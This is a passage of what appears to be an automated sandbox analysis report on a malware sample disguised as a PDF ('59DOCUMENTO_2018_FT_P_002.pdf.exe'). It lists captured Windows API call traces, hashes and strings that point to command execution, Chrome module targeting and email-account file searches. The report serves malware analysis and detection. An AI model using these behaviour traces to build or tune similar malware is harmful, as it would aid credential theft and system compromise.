    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 128
  • API ID: lstrlen$RtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 1738276641-0
  • Opcode ID: aaba7d0a47ca100521561682d36ca88f08b4b9b0e2dd2eccb0d3987922e97ba9
  • Instruction ID: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
  • Opcode Fuzzy Hash: B7C012A4436C87C88CC059470679660D1C55FF6B0001C530BB0542A31D47523AB6758D
  • Instruction Fuzzy Hash: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
APIs
  • lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
  • lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
  • wsprintfW.USER32 ref: 01B3469A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name: d3d8sext.exe
Process MD5: 28093D270494BF7FD72450B008A4D71A
Total matches: 161
Initial Analysis Report: Open
Initial sample Analysis ID: 68250
Initial sample SHA 256: 522FC57F7A4F79ACDD2A84AD6941117A33B3B464DEB30E5F5826F9049E04472E
Initial sample name: 59DOCUMENTO_2018_FT_P_002.pdf.exe

Similar Executed Functions

Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
